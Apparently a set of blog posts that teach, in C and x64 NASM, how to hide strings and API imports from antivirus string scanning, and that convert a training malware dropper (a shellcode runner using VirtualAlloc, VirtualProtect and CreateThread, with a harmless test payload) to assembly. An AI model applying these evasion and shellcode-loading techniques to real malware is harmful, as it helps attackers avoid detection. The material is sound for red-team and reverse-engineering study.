String anti-virus evasion in x64 assembly (Part 2)

In my last blog post, I discussed a way to hide parameter strings from being detected by an anti-virus. The solution was simple and it worked. However, it was incomplete as strings of function calls and loaded DLLs were still detectable in memory.

string-anti-virus-evasion-in-x64-assembly-part-2-01

In this post I'll be talking about the other technique from the same blog post we were following before. It does a good job of explaining the concept which I'll be covering here too. I will also be writing the code in assembly as an added bonus, so we can better understand what goes on under the hood.

The problem

Let's revisit our code from last time. It calls two functions: ShellExecuteA and ExitProcess.

#include <windows.h>
#include <shellapi.h>

int main(void)
{
    char ca_notepad[] = { 'n','o','t','e','p','a','d',0 };
    ShellExecuteA(0, "open", ca_notepad, NULL, NULL, SW_SHOW);

    ExitProcess(0);
}

When the program is built, the names of all imported functions are stored in the executable (in this case, in the .rdata segment) as readable strings:

string-anti-virus-evasion-in-x64-assembly-part-2-07

A function name like ShellExecuteA is sure to raise some eyebrows, so we do not want it to be detectable. To hide it, we need to load the DLL at runtime with LoadLibrary and look up the function with GetProcAddress.

Coding in C

LoadLibrary accepts a string containing the DLL that we want to load.

    HANDLE hShell32 = LoadLibrary("shell32.dll");

This loads the DLL's code into memory and returns a handle to that location. We can see the result of this when we look at the memory map in a debugger. Here's the memory map prior to calling LoadLibrary:

string-anti-virus-evasion-in-x64-assembly-part-2-03

And here's what it looks like after:

string-anti-virus-evasion-in-x64-assembly-part-2-04

The LoadLibrary API loaded shell32.dll along with its dependencies into memory. We can also see that it automatically decided where the new DLLs are placed; in this case, in between pre-existing ones.


Aside: How do we know which DLL is needed?

We can find out which DLL a function needs by looking at its MSDN documentation. Scroll to the end of the function's documentation page to find the "Requirements" section, which lists the DLL that it needs.

string-anti-virus-evasion-in-x64-assembly-part-2-02


LoadLibrary then returns a HANDLE object which we can then pass to GetProcAddress.

    _ShellExecuteA fShellExecuteA = (_ShellExecuteA) GetProcAddress(hShell32, "ShellExecuteA");

GetProcAddress looks through the library we loaded and returns the address of the ShellExecuteA function. This address needs to be cast to a function pointer type before it can be called. This means we need to declare a typedef that matches the function's signature, which we can determine by looking at the "Syntax" section in MSDN.
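The cast is needed because a lookup-by-name function can only hand back a generic pointer. Here is a minimal, portable sketch of the same pattern. Note that lookup_symbol, add_numbers, GenericProc and BinaryOp are hypothetical stand-ins (for GetProcAddress, the exported function, FARPROC and our typedef) so that the example compiles without windows.h.

```c
#include <stddef.h>
#include <string.h>

/* Generic function pointer, playing the role of FARPROC. */
typedef void (*GenericProc)(void);

/* Typed function pointer, playing the role of _ShellExecuteA. */
typedef int (*BinaryOp)(int a, int b);

/* Hypothetical "exported" function that we want to find by name. */
int add_numbers(int a, int b)
{
    return a + b;
}

/* Hypothetical stand-in for GetProcAddress: resolves a name to an address. */
GenericProc lookup_symbol(const char *name)
{
    if (strcmp(name, "add_numbers") == 0)
        return (GenericProc) add_numbers;
    return NULL; /* Unknown name, similar to a failed GetProcAddress */
}

/* Resolve the function by name, cast it to the right type, then call it. */
int call_by_name(const char *name, int a, int b)
{
    BinaryOp op = (BinaryOp) lookup_symbol(name);
    if (op == NULL)
        return -1; /* Check the result before calling through it */
    return op(a, b);
}
```

Calling call_by_name("add_numbers", 2, 3) goes through the typed pointer, just like fShellExecuteA does in our code. The NULL check is worth copying too, since GetProcAddress returns NULL when the name is not found.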

Here's the syntax for ShellExecuteA according to its documentation:

HINSTANCE ShellExecuteA(
  [in, optional] HWND   hwnd,
  [in, optional] LPCSTR lpOperation,
  [in]           LPCSTR lpFile,
  [in, optional] LPCSTR lpParameters,
  [in, optional] LPCSTR lpDirectory,
  [in]           INT    nShowCmd
);

And here's our typedef implementation:

typedef HINSTANCE (*_ShellExecuteA) (
    HWND   hwnd,
    LPCSTR lpOperation,
    LPCSTR lpFile,
    LPCSTR lpParameters,
    LPCSTR lpDirectory,
    INT    nShowCmd
);

When everything is set up properly, the variable fShellExecuteA can be used like a function.

    fShellExecuteA(0, "open", ca_notepad, NULL, NULL, SW_SHOW);

Combining these together, this is what our code will look like:

#include <windows.h>

typedef HINSTANCE (*_ShellExecuteA) (
    HWND   hwnd,
    LPCSTR lpOperation,
    LPCSTR lpFile,
    LPCSTR lpParameters,
    LPCSTR lpDirectory,
    INT    nShowCmd
);

int main(void)
{
    HANDLE hShell32 = LoadLibrary("shell32.dll");
    _ShellExecuteA fShellExecuteA = (_ShellExecuteA) GetProcAddress(hShell32, "ShellExecuteA");

    char ca_notepad[] = { 'n','o','t','e','p','a','d',0 };
    fShellExecuteA(0, "open", ca_notepad, NULL, NULL, SW_SHOW);

    ExitProcess(0);
}

We are not done yet, however, as strings.exe can still detect our strings. This is because "shell32.dll" and "ShellExecuteA" are now passed as string literals to LoadLibrary and GetProcAddress, and these literals are placed in the .data segment.

string-anti-virus-evasion-in-x64-assembly-part-2-05

This is where we can use the technique from part 1. By declaring the string as a local character array, the data is built on the stack instead of being stored in the .data segment.

Applying this technique gives us the following:

    char ca_shell32[] = { 's','h','e','l','l','3','2','.','d','l','l', 0 };
    HANDLE hShell32 = LoadLibrary(ca_shell32);

    char ca_shellExA[] = { 'S','h','e','l','l','E','x','e','c','u','t','e','A', 0 };
    _ShellExecuteA fShellExecuteA = (_ShellExecuteA) GetProcAddress(hShell32, ca_shellExA);

And now we can see that it works!

string-anti-virus-evasion-in-x64-assembly-part-2-06

Converting to assembly

As promised, we'll be converting the code above into x64 Windows assembly. It's an extra step, but approaching the problem from a different programming language can give us a better understanding.

Starting from the beginning, we'll be using LoadLibraryA and GetProcAddress to dynamically load the ShellExecuteA function at runtime.

If we fast forward a bit, here's what we'll end up with:

    lea rcx, [str_shell32]     ; Load "shell32.dll" string
    sub rsp, 32
    call    LoadLibraryA       ; Call "LoadLibraryA"
    add rsp, 32

    mov rcx, rax               ; Save result of LoadLibraryA to rcx
    lea rdx, [str_shexa]       ; Load "ShellExecuteA" string
    sub rsp, 32
    call    GetProcAddress     ; Call "GetProcAddress"
    add rsp, 32

    mov rbx, rax               ; The address of "ShellExecuteA" is saved to rbx
    ...                        
    ... 
    call    rbx                ; Call "ShellExecuteA"

Wait, that's it? Yes!

This is one of those rare moments where the assembly code is more straightforward than C. This is because the value returned by GetProcAddress is already an address. Since assembly deals with memory addresses directly, there's no need for a cast like the one in the C version. The address can be called as is.

And just like the previous one, the code above is still not complete. The "shell" strings are still visible via strings.exe so we need to apply the technique again from Part 1. I won't be showing it step by step here anymore as it's quite lengthy.

This means that this example piece of code:

    lea rcx, [str_shell32]     ; Load "shell32.dll" string
    sub rsp, 32
    call    LoadLibraryA       ; Call "LoadLibraryA"
    add rsp, 32

Will now be like this:

    sub rsp, 16          ; Place "shell32.dll" string to the stack
    addstr2stack "s", "h", "e", "l", "l", "3", "2", ".", "d", "l", "l", 0x0 
    lea rcx, [rsp]

    sub rsp, 32
    call    LoadLibraryA ; Call "LoadLibraryA"
    add rsp, 32

addstr2stack is a macro we wrote in part 1. It makes declaring a string array easier.

Combining everything again, here's the final assembly code with comments:

    push    rbp
    mov     rbp, rsp
    sub rsp, 32

    ;; = START LOADLIBRARY ===========================================

    sub rsp, 16         ; Place "shell32.dll" string to the stack
    addstr2stack "s", "h", "e", "l", "l", "3", "2", ".", "d", "l", "l", 0x0 
    lea rcx, [rsp]

    sub rsp, 32
    call    LoadLibraryA ; Call LoadLibraryA
    add rsp, 32

    add rsp, 16         ; Release "shell32.dll" string from stack

    ;; = END LOADLIBRARY ===========================================


    ;; = START GETPROCADDRESS ===========================================

    mov rcx, rax        ; Save value to rcx (1st parameter register)

    sub rsp, 16         ; Place "ShellExecuteA" string to the stack
    addstr2stack "S", "h", "e", "l", "l", "E", "x", "e", "c", "u", "t", "e", "A", 0x0
    lea rdx, [rsp]

    sub rsp, 32
    call    GetProcAddress  ; Call GetProcAddress
    add rsp, 32

    add rsp, 16         ; Release "ShellExecuteA" from stack

    ;; = END GETPROCADDRESS ===========================================


    ;; = START SHELLEXECUTEA ===========================================

    mov r12, rax        ; Save address of "ShellExecuteA" to r12 (To be called later)

    sub rsp, 16         ; Place "notepad" string to the stack
    addstr2stack "n", "o", "t", "e", "p", "a", "d", 0x0
    lea r8, [rsp]

    push    0x5
    push    0x0
    xor r9, r9

    lea rdx, [msg_open] 
    xor rcx, rcx

    sub rsp, 32
    call    r12         ; Call "ShellExecuteA" through its address
    add rsp, 32

    add rsp, 16         ; Release "notepad" string from stack

    ;; = END SHELLEXECUTEA ===========================================

    xor     ecx, ecx    ; uExitCode = 0 (1st parameter goes in rcx)
    call    ExitProcess

I know there's a lot to digest in the code above. I've made its flow similar to that of the C program so you can review them side by side if you feel lost. Hopefully, the comments and the separators help too.

Note: Pay special attention to how the stack space is reserved (with sub rsp, 16) and released (with add rsp, 16). I did not discuss stack alignment as it's a lengthy explanation in itself. Just remember that we release the data only after the function that uses it has returned.

If done correctly, the strings would not be detectable because the data is now on the stack and not in the .data segment.

string-anti-virus-evasion-in-x64-assembly-part-2-06


It is important to note that anti-viruses can employ different techniques to do detection, but a huge part of their functionality will rely on detecting malicious strings. So at least, on that front, we now have an idea on how to defeat it.

You can view the code for parts 1 and 2 on GitHub. Updates and fixes will be placed there.

I might post more assembly shenanigans in the future, so stay tuned.

And as always, for any questions or comments, feel free to reach out to me on Twitter or LinkedIn.

String anti-virus evasion in x64 assembly (Part 1)

One of the features I implemented for my Remote Access Tool was an anti-virus evasion capability in the form of strings obfuscation. It wouldn't fool an EDR or a reverse engineer but it was quick to implement so I added it.

This was over a year ago. I decided to revisit this feature to try and understand it better and find out if it is actually effective.

What to expect

In this two-part blog post I will look into the following:

  • Hiding argument strings
  • Hiding API call strings

The one you are reading now is about the first one. I will be explaining how it's done in C and later convert it to x64 Windows assembly so we can better understand what's happening under the hood.

Hiding function argument strings

I got the idea for this AV evasion technique from this blog post. The author posits that one part of an anti-virus detection capability is through checking for suspicious strings in an executable.

For the purpose of this post, let's pretend that "notepad" is a suspicious string that we don't want to be detected by the anti-virus.

#include <windows.h>
#include <shellapi.h>

int main(void)
{
    ShellExecute(0, "open", "notepad", NULL, NULL, SW_SHOW);
}

You might think that a call to ShellExecute is already a big red flag, and you are right. It is! But we'll talk about hiding API calls in the next post. Let's focus on the parameter for now.

In the place of the anti-virus, we'll be using the strings command to check for visible strings like so:

string-anti-virus-evasion-in-x64-assembly-part-1-01

As expected, the word "notepad" is easily detected. This is because any string literal that we use in a program gets placed in the .data segment by the compiler:

string-anti-virus-evasion-in-x64-assembly-part-1-02

To prevent detection, we need a way for the string to not be present in our compiled executable.
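To get a feel for what a strings-style scan is looking for, here is a rough sketch in C. It is not how the real tool is implemented; visible_in_strings and its min_len parameter are names I made up for illustration. It walks a buffer, finds runs of printable characters, and reports whether a given word sits inside a run that is long enough to be printed.

```c
#include <ctype.h>
#include <stddef.h>
#include <string.h>

/* Returns 1 if `needle` appears inside a run of at least `min_len`
 * printable characters in `buf`, which is roughly how a strings-style
 * scan would surface it. Returns 0 otherwise. */
int visible_in_strings(const unsigned char *buf, size_t len,
                       const char *needle, size_t min_len)
{
    size_t needle_len = strlen(needle);
    size_t start = 0;

    while (start < len) {
        /* Skip bytes that are not printable */
        if (!isprint(buf[start])) {
            start++;
            continue;
        }

        /* Measure the printable run that starts here */
        size_t end = start;
        while (end < len && isprint(buf[end]))
            end++;

        size_t run = end - start;
        if (run >= min_len && needle_len <= run) {
            /* Search for the needle inside this run only */
            for (size_t i = 0; i + needle_len <= run; i++) {
                if (memcmp(buf + start + i, needle, needle_len) == 0)
                    return 1;
            }
        }
        start = end;
    }
    return 0;
}
```

The key point is that the word is only found when its bytes sit next to each other in the file. If anything breaks up the run, the scan no longer sees it.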

The solution

The solution is to declare the string to be passed as the parameter like so:

    char ca_notepad[] = { 'n','o','t','e','p','a','d', 0 };
    ShellExecute(0, "open", ca_notepad, NULL, NULL, SW_SHOW);

And when strings is run, we now see that the "notepad" string is not present anymore.

string-anti-virus-evasion-in-x64-assembly-part-1-03

How did this happen?

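This is because an array that is declared within a function and initialized character by character is built on the stack at runtime instead of being stored in the .data segment (as long as it is not declared as static). Keep in mind that this depends on the compiler and its optimization settings, as an optimizer is free to initialize the array in a different way.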
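To make the idea concrete, here is a small portable sketch that builds the string one byte at a time in a local array. The function name build_notepad and the volatile qualifier are my additions; volatile is there to discourage the optimizer from merging the byte stores into one wide constant.

```c
#include <stddef.h>

/* Builds "notepad" one character at a time in a local (stack) array and
 * copies it into `out`, which must have room for at least 8 bytes. */
void build_notepad(char *out)
{
    /* volatile: keep the individual byte stores (an assumption of this sketch) */
    volatile char ca_notepad[8];

    ca_notepad[0] = 'n';
    ca_notepad[1] = 'o';
    ca_notepad[2] = 't';
    ca_notepad[3] = 'e';
    ca_notepad[4] = 'p';
    ca_notepad[5] = 'a';
    ca_notepad[6] = 'd';
    ca_notepad[7] = 0;   /* NULL terminator */

    /* Hand the finished string to the caller */
    for (size_t i = 0; i < sizeof ca_notepad; i++)
        out[i] = ca_notepad[i];
}
```

Each assignment becomes its own store instruction with the character as an immediate value, so the letters end up scattered between instruction bytes rather than sitting together as one readable string.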

To further understand how this happens, let's convert this C program into x64 assembly.

Converting to x64 assembly

First, we set up our boilerplate code with an entry point and a call to ExitProcess.

    bits 64
    default rel

segment .text
    global main
    extern ExitProcess

main:
    push    rbp
    mov     rbp, rsp

    xor     ecx, ecx    ; uExitCode = 0 (1st parameter goes in rcx)
    call    ExitProcess

Before we can call ShellExecute, we first need to import the ShellExecuteA symbol using extern.

segment .text
    ...
    extern ExitProcess
    extern ShellExecuteA

Aside: Why ShellExecuteA and not ShellExecute?

Because if you look in the MSDN documentation, you will find that there isn't really a ShellExecute function. There are, however, ShellExecuteA (for ANSI strings) and ShellExecuteW (for Unicode strings). ShellExecute is just a macro that expands to one of these two functions. We can confirm this by looking at the shellapi.h source code.

#ifdef UNICODE
#define ShellExecute  ShellExecuteW
#else
#define ShellExecute  ShellExecuteA
#endif // !UNICODE

Since assembly does not use header files, we can just call ShellExecuteA or ShellExecuteW directly. In this example, we won't be needing Unicode support, so we're going to use the former.


Before we call the function in assembly, let's go back and take a look at how we did it in C.

ShellExecute(0, "open", "notepad", NULL, NULL, SW_SHOW);

We have 6 parameters to pass to the function. Here's how we can write this in assembly using the Microsoft x64 calling convention.

    push    0x5              ; nShowCmd ; SW_SHOW == 0x5
    push    0x0              ; lpDirectory ; NULL == 0x0
    xor r9, r9               ; lpParameters ; Clear register == NULL

    lea r8, [msg_notepad]    ; lpFile
    lea rdx, [msg_open]      ; lpOperation

    xor rcx, rcx             ; hwnd

    sub rsp, 32
    call    ShellExecuteA    ; Call function
    add rsp, 32

We then initialize the strings by adding a data segment section:

segment .data
    msg_open    db  "open", 0
    msg_notepad db  "notepad", 0

For reference, here is our full code so far:

    bits 64
    default rel

segment .data
    msg_open    db  "open", 0
    msg_notepad db  "notepad", 0

segment .text
    global main
    extern ExitProcess
    extern ShellExecuteA

main:
    push    rbp
    mov     rbp, rsp

    push    0x5
    push    0x0
    xor r9, r9

    lea r8, [msg_notepad]
    lea rdx, [msg_open] 
    xor rcx, rcx    

    sub rsp, 32
    call    ShellExecuteA
    add rsp, 32

    xor     ecx, ecx    ; uExitCode = 0 (1st parameter goes in rcx)
    call    ExitProcess

Take note that this version of the code is still the one where the "notepad" string is detectable.

To hide this string, we need to apply the same solution we used in our C code, which is to build the data on the stack so that it is not stored in the .data segment.

Here is how we did it in C:

    char ca_notepad[] = { 'n','o','t','e','p','a','d', 0 };
    ShellExecute(0, "open", ca_notepad, NULL, NULL, SW_SHOW);

And here is how to do it in assembly:

    sub rsp, 8             ; Reserve space on stack for string
    mov byte [rsp], "n"
    mov byte [rsp+1], "o"
    mov byte [rsp+2], "t"
    mov byte [rsp+3], "e"
    mov byte [rsp+4], "p"
    mov byte [rsp+5], "a"
    mov byte [rsp+6], "d"
    mov byte [rsp+7], 0x0   
    lea r8, [rsp]          ; Load address of string to r8
    add rsp, 8             ; Reclaim space

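Here's a summary of the above code:

  • Since our string is 8 bytes long (including the 0x0 NULL terminator), we reserve space on the stack with sub rsp, 8.
  • Each character is then placed individually in the reserved space using mov byte while adding an offset to rsp.
  • The address pointed to by rsp is then loaded into the r8 register (this holds our 3rd parameter).
  • We reclaim our reserved space using add rsp, 8. The bytes are not erased, but they are no longer reserved, so a later push or function call may overwrite them. The safer order, used with the macro later in this post, is to release the space only after the function call has returned.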

After the code above, r8 would now point to the location in the stack where our string resides:

string-anti-virus-evasion-in-x64-assembly-part-1-04


Aside: What if we have longer strings?

If we have a longer string like "powershell", then we need to reserve more space on the stack. Take note, however, that when reserving space we need to maintain the stack alignment, so we add and subtract in multiples of 8 (and, as discussed later in this post, in multiples of 16 when a function call follows). The "powershell" string needs 11 bytes including the terminator, so we use 16.

    sub rsp, 16
    mov byte [rsp], "p"
    mov byte [rsp+1], "o"
    mov byte [rsp+2], "w"
    mov byte [rsp+3], "e"
    mov byte [rsp+4], "r"
    mov byte [rsp+5], "s"
    mov byte [rsp+6], "h"
    mov byte [rsp+7], "e"
    mov byte [rsp+8], "l"
    mov byte [rsp+9], "l"
    mov byte [rsp+10], 0x0

    lea r8, [rsp]
    add rsp, 16

With this final version of the code, "notepad" will not be visible to strings anymore.

Here is our final code:

    bits 64
    default rel

segment .data
    msg_open    db  "open", 0

segment .text
    global main
    extern ExitProcess
    extern ShellExecuteA

main:
    push    rbp
    mov     rbp, rsp

    push    0x5
    push    0x0
    xor r9, r9

    sub rsp, 8
    mov byte [rsp], "n"
    mov byte [rsp+1], "o"
    mov byte [rsp+2], "t"
    mov byte [rsp+3], "e"
    mov byte [rsp+4], "p"
    mov byte [rsp+5], "a"
    mov byte [rsp+6], "d"
    mov byte [rsp+7], 0x0   
    lea r8, [rsp]
    add rsp, 8

    lea rdx, [msg_open] 
    xor rcx, rcx    

    sub rsp, 32
    call    ShellExecuteA
    add rsp, 32

    xor     ecx, ecx    ; uExitCode = 0 (1st parameter goes in rcx)
    call    ExitProcess

Hiding at scale

Writing the code above can get a little tedious especially if we want to pass a really long string. Thankfully, we can use a macro like the one I've written below:

%macro  addstr2stack    1-*
    %assign i 0
    %assign j 0
    %rep    %0
        mov byte [rsp+i+8*j], %1
        %assign i i+1
        %rotate 1

        %if i >= 8
            %assign j j+1
            %assign i 0
        %endif
    %endrep
%endmacro

What the macro does is that it loops through each character and places it into the correct position on the stack.
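If the NASM macro syntax is hard to follow, here is the same bookkeeping written as a C sketch. The function addstr2buf is a made-up name, and a plain buffer stands in for the reserved stack space. As in the macro, i is the byte within the current 8-byte slot and j is the slot number.

```c
#include <stddef.h>

/* Mirrors addstr2stack: each character lands at offset i + 8*j from `base`,
 * where `i` counts bytes within an 8-byte slot and `j` counts slots. */
void addstr2buf(unsigned char *base, const char *chars, size_t count)
{
    size_t i = 0;
    size_t j = 0;

    for (size_t n = 0; n < count; n++) {
        base[i + 8 * j] = (unsigned char) chars[n];
        i++;

        /* Slot is full: move on to the next 8-byte slot */
        if (i >= 8) {
            j++;
            i = 0;
        }
    }
}
```

Since i + 8*j always works out to the position of the character in the list, the characters end up contiguous in memory, which is what we need for a valid C string.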

Important note: When reserving space on the stack, make sure it is in multiples of 16! This is because the x64 calling convention requires the stack to be aligned to a 16-byte boundary when a function is called!

For example, if our string has 10 characters, we only need to reserve 16 bytes. If our string is 20 characters long, we'd have to reserve 32 bytes.
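The rounding can be worked out with a one-liner. Below is a small sketch in C; stack_reserve_size is a hypothetical helper name, and its argument is the size of the string in bytes including the NULL terminator.

```c
#include <stddef.h>

/* Rounds the number of bytes needed for a string (terminator included)
 * up to the next multiple of 16, to use with sub rsp / add rsp. */
size_t stack_reserve_size(size_t string_bytes)
{
    return (string_bytes + 15) & ~(size_t) 15;
}
```

A 10-character string needs 11 bytes with its terminator, which rounds up to 16. A 20-character string needs 21 bytes, which rounds up to 32.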

This macro can then be called like this:

    sub rsp, 16        ; Reserve space for the string on the stack
    addstr2stack "n", "o", "t", "e", "p", "a", "d", 0x0
    lea r8, [rsp]
    ...
    add rsp, 16        ; After use, release the space

Here is what the result of the macro looks like in the debugger:

string-anti-virus-evasion-in-x64-assembly-part-1-05

For the full source code visit the repo on Github. Updates and fixes to the code will be pushed there.


So there you have it, we were able to successfully hide strings by changing how the data is declared and placed in memory. If you think about it, the technique is very simple.

However, we've only seen it used against the strings command. Can it evade an actual anti-virus? The answer is probably no. In my next post I'll be talking about API call obfuscation that would help hide functions like ShellExecute.

Edit: Part 2 is here. Also, for any questions or comments, feel free to reach out to me on Twitter or LinkedIn.

Converting a malware dropper to x64 assembly

In this post I'll be listing down lessons I learned while converting a simple malware dropper written in C to x64 assembly.

I started this project as a way to deepen my understanding of assembly so I could be better in malware development and reverse engineering (And also because I love coding in assembly and would always find an excuse to use it).

What to expect

I'll be going through sections of the C file and showing how each can be written in x64 Windows assembly. Take note, however, that the conversion is not one-to-one, meaning there are other ways of writing it. What I did was structure the assembly code so that you can easily compare it with the C code while making sure that the end result is the same.

I won't be covering the basics of assembly because this post does a better job of doing that. And as for the assembler, I'll be using nasm because this is the one I'm most familiar with.

Disclaimer: I am not an expert in any of these topics. I'm just someone who learned a few things and wishes to share them with others. If I'm wrong about anything, feel free to point it out.

Credits

The malware dropper that we'll be converting was made by @reenz0h. I found it in kymb0's repository and learned that it's part of the Red Team Operator course by Sektor7. I've read good things about the course and I plan to take it in the future. You should check it out too.

The dropper

Here's the malware dropper that we'll be converting:

/*

 Red Team Operator course code template
 storing payload in .data section

 author: reenz0h (twitter: @sektor7net)

*/
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

// 4 byte payload
unsigned char payload[] = {
    0x90,       // NOP
    0x90,       // NOP
    0xcc,       // INT3
    0xc3        // RET
};
unsigned int payload_len = 4;

int main(void) {

    void * exec_mem;
    BOOL rv;
    HANDLE th;
    DWORD oldprotect = 0;

    // Allocate a memory buffer for payload.
    exec_mem = VirtualAlloc(0, payload_len, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
    printf("%-20s : 0x%-016p\n", "payload addr", (void *)payload);
    printf("%-20s : 0x%-016p\n", "exec_mem addr", (void *)exec_mem);

    // Copy payload to new buffer
    RtlMoveMemory(exec_mem, payload, payload_len);

    // Make new buffer as executable
    rv = VirtualProtect(exec_mem, payload_len, PAGE_EXECUTE_READ, &oldprotect);

    printf("\nHit me!\n");
    getchar();

    // If all good, run the payload
    if ( rv != 0 ) {
            th = CreateThread(0, 0, (LPTHREAD_START_ROUTINE) exec_mem, 0, 0, 0);
            WaitForSingleObject(th, -1);
    }

    return 0;
}

Here is what the code does:

  • Allocates memory buffer with size payload_len
  • Copies payload to the buffer
  • The buffer's memory protection is changed to PAGE_EXECUTE_READ which allows for code execution
  • A thread is created to run the payload, and the program waits indefinitely for that thread to finish

It doesn't seem that the program is doing much when run. All we see are the payload and exec_mem addresses for debugging purposes and nothing much else.

converting-a-malware-dropper-to-x64-assembly-01

The most interesting parts with this code will be seen under a debugger, which I'll go through later in this post.

Including external functions

In C, if we want to use a Windows API function, we need to include the necessary header files and make sure to supply the required library names to the linker, like so:

#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

x64 assembly does not use header files so the process is done differently. First, the necessary ".lib" files should be supplied to the linker:

link dropper_data.obj /subsystem:console /out:dropper_data.exe kernel32.lib msvcrt.lib

Next, every external function that we'll be using in our code needs to be specified as shown below:

segment .text
    global main
    extern ExitProcess
    extern printf
    extern VirtualAlloc
    extern VirtualProtect
    extern RtlMoveMemory
    extern getchar
    extern CreateThread
    extern WaitForSingleObject

Note that the extern keyword in NASM is close to, but not the same as, extern in C. In C, extern declares a symbol with external linkage that may be defined in another file. In NASM, extern only imports a symbol that is defined in another module, and global is the directive used for exporting.

Once the symbols are properly imported, the functions can be used with the call instruction.

The entrypoint

There needs to be an entry point so that the operating system knows where to jump to start our program. We do this in C by declaring a main function:

int main(void) {
    ...
}

In assembly, we declare the entry point with global main (As seen in the previous section) and also supply the main: label within the code. This is where execution will jump to.

segment .text
   global main
   ...
   ...

main:
   push    rbp
   ...
   ...

The payload

The payload in this example is a simple shellcode made for testing purposes. This can be changed to any shellcode of any length as long as payload_len reflects the new size of the shellcode.

// 4 byte payload
unsigned char payload[] = {
    0x90,       // NOP
    0x90,       // NOP
    0xcc,       // INT3
    0xc3        // RET
};
unsigned int payload_len = 4;
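Since payload_len has to track the size of the array, one option in C is to let the compiler compute it. This is a small sketch and not part of the original dropper:

```c
/* 4 byte payload */
unsigned char payload[] = {
    0x90,       /* NOP  */
    0x90,       /* NOP  */
    0xcc,       /* INT3 */
    0xc3        /* RET  */
};

/* sizeof counts the bytes in the array, so the length stays correct
 * when the shellcode is swapped for a longer one. */
unsigned int payload_len = (unsigned int) sizeof payload;
```

With this, changing the bytes in payload is the only edit needed when the shellcode changes.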

In assembly, initializing data is done in segment .data.

segment .data
    ...
    ...
    ;; 4 byte payload
    payload         db  0x90, 0x90, 0xCC, 0xC3
    payload_len     db  4

We can then check the above data laid out in the .data memory segment using a debugger:

converting-a-malware-dropper-to-x64-assembly-02

converting-a-malware-dropper-to-x64-assembly-03

You may notice that our shellcode is not at the start of the .data segment because there is other data that was declared before our payload. This is important to note, as the order in which we declare the data is the order in which it appears in memory.

Initialized data

All data in assembly needs to be declared and initialized before it can be used:

segment .data
    msg_hello       db  "Hello world!", 0xd, 0xa, 0
    msg_exec_addr   db  "exec_mem addr", 0
    msg_pload_addr  db  "payload addr", 0   
    msg_format      db  "%-20s : 0x%-016p", 0xd, 0xa, 0
    msg_hit_me      db  "Hit me!", 0xd, 0xa, 0

    ...
    ...
    lea rcx, [msg_format]
    lea rdx, [msg_pload_addr]
    ...
    call    printf
    ...

This is optional in C as you can pass data (like a string) directly to a function without adding it to a variable:

printf("%-20s : 0x%-016p\n", "payload addr", (void *)payload);
printf("%-20s : 0x%-016p\n", "exec_mem addr", (void *)exec_mem);

However, under the hood, the C compiler actually places these data on the .data segment for you automatically. If you were to compile and run the C program you would see that the strings are in the .data segment.

Uninitialized data

Memory of a certain size can be reserved so that it can be used later in a program. This uninitialized data is declared not in a .data segment but in a .bss segment (more here).

segment .bss    
    exec_mem    resb    8
    old_protect resb    8

NASM provides specific "pseudo-instructions" for declaring uninitialized data like resb (reserve bytes), resw (reserve words), and so on.

Alternatively, this can be written like this:

segment .bss    
    exec_mem        db  8 dup (?)   ; Reserve 8 bytes of ? null value
    old_protect     dq  1           ; DQ = QWORD

It would still work but NASM doesn't like it and would throw a warning.

dropper_data.asm:18: warning: attempt to initialize memory in BSS section `.bss': ignored [-w+other]

The memory for the uninitialized data won't be reserved until the program is loaded. Once it is, we can see the reserved memory in the .data segment.

Any data we move to the previously uninitialized memory can now be seen from a debugger. See below for an example:

    mov [exec_mem], rax  ; Move "000001F96E100000" to memory

converting-a-malware-dropper-to-x64-assembly-04
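For comparison, C has the same distinction. File-scope variables without an initializer typically end up in .bss, and the language guarantees they start out zeroed when the program is loaded. Here is a small sketch, where exec_mem_slot, old_protect_slot and all_zero are names chosen for illustration:

```c
#include <stddef.h>

/* No initializer: typical toolchains place these in .bss,
 * much like "resb 8" does in NASM. */
unsigned char exec_mem_slot[8];
unsigned char old_protect_slot[8];

/* Returns 1 if every byte in the buffer is zero, 0 otherwise. */
int all_zero(const unsigned char *buf, size_t len)
{
    for (size_t i = 0; i < len; i++) {
        if (buf[i] != 0)
            return 0;
    }
    return 1;
}
```

Before anything is written to them, both buffers read back as all zeros, which matches what the debugger shows for freshly reserved memory.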

Shadow Spaces

When calling a function in x64 Windows assembly, we must reserve a "shadow space" on the stack before each call to an external function, such as one written in C or C++. For example:

    sub     rsp, 32 
    call    getchar
    add     rsp, 32

But what is a shadow space? Here is a quick explanation:

The shadow space is the mandatory 32 bytes (4x8 bytes) you must reserve for the called procedure. It just means you must provide 32 bytes on the stack before calling.

It can be used by compilers to leave a copy of the register values on the stack for later inspection in the debugger. It is meant to be used to make debugging x64 easier.

So in the code above, sub rsp, 32 reserves the shadow space before getchar is called. The space on the stack is highlighted in the image below.

converting-a-malware-dropper-to-x64-assembly-05

call getchar then executes and the "shadow space" gets filled.

converting-a-malware-dropper-to-x64-assembly-06

As the caller, we really do not care about the data that gets placed in the shadow space. So after calling the function, we do add rsp, 32 to reclaim the shadow space.

You'll find out the importance of properly reserving and releasing a shadow space especially if you are relying on the stack for saving local variables. Here is a segment of the code where I found out first-hand the importance of handling the shadow space.

    push    rax                ;; I need rax for later so I pushed it on the stack

    lea     rcx, [msg_hit_me]
    call    printf             ;; printf was expecting a shadow space so it just wrote onto the stack, overwriting the value from RAX before

    call    getchar            ;; getchar did the same too

    pop rax                    ;; The value saved by rax is overwritten

Simply handling the shadow space avoided this problem:

    push    rax

    lea     rcx, [msg_hit_me]
    sub     rsp, 32            ;; shadow space is reserved
    call    printf             ;; printf can write to the stack without overwriting data that I need
    add     rsp, 32            ;; shadow space is released

    sub     rsp, 32            ;; shadow space is reserved
    call    getchar            ;; same goes with getchar
    add     rsp, 32            ;; shadow space is released

    pop rax                    ;; I got the correct value from rax that I pushed

The above code can be further optimized by only releasing the shadow space after both calls to printf and getchar, as shown below:

    push    rax

    lea     rcx, [msg_hit_me]
    sub     rsp, 32            ;; shadow space is reserved
    call    printf             ;; printf can write to the stack without overwriting data that I need

    call    getchar            ;; same goes with getchar
    add     rsp, 32            ;; shadow space is released

    pop rax                    ;; I got the correct value from rax that I pushed

However, there might come a time when the code will change and you might forget to re-add the code that releases and reserves the shadow space. This may lead to hard-to-find stack related problems. To avoid this, just make it a habit to reserve and release the shadow space every time an external function is called.

As an alternative, you can use a routine that could reserve and release the shadow space automatically like the one below:

shadow_call:
    pop rbx         ; Get the return address pointer in a non-volatile register
    sub rsp, 20h    ; Add the shadow space
    call rax        ; Call the function
    add rsp, 20h    ; Remove the shadow space
